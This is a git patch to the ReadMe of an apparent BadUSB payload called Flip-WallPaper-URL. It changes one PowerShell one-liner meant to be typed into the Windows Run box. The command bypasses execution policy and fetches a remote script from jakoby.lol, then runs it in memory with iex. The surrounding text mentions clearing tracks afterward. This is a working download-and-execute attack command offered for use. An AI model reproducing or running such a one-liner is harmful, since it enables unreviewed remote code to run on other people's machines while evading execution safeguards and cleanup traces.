From e05ae050f35e001ad28547f7063358a6ff04a574 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 1 Jan 2023 17:19:50 -0600 Subject: [PATCH] Update ReadMe.md --- Payloads/Flip-WallPaper-URL/ReadMe.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-WallPaper-URL/ReadMe.md b/Payloads/Flip-WallPaper-URL/ReadMe.md index 80bc107..833034f 100644 --- a/Payloads/Flip-WallPaper-URL/ReadMe.md +++ b/Payloads/Flip-WallPaper-URL/ReadMe.md @@ -38,7 +38,7 @@ Lastly, to clean up your tracks behind you, the tmp folder will be emptied and t * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory * Place your images URL in the $url variable ``` -powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';iwr jakoby.lol/pkw | iex +powershell -noexit -NoP -NonI -Exec Bypass $url='URL-HERE';irm jakoby.lol/pkw | iex ```

(back to top)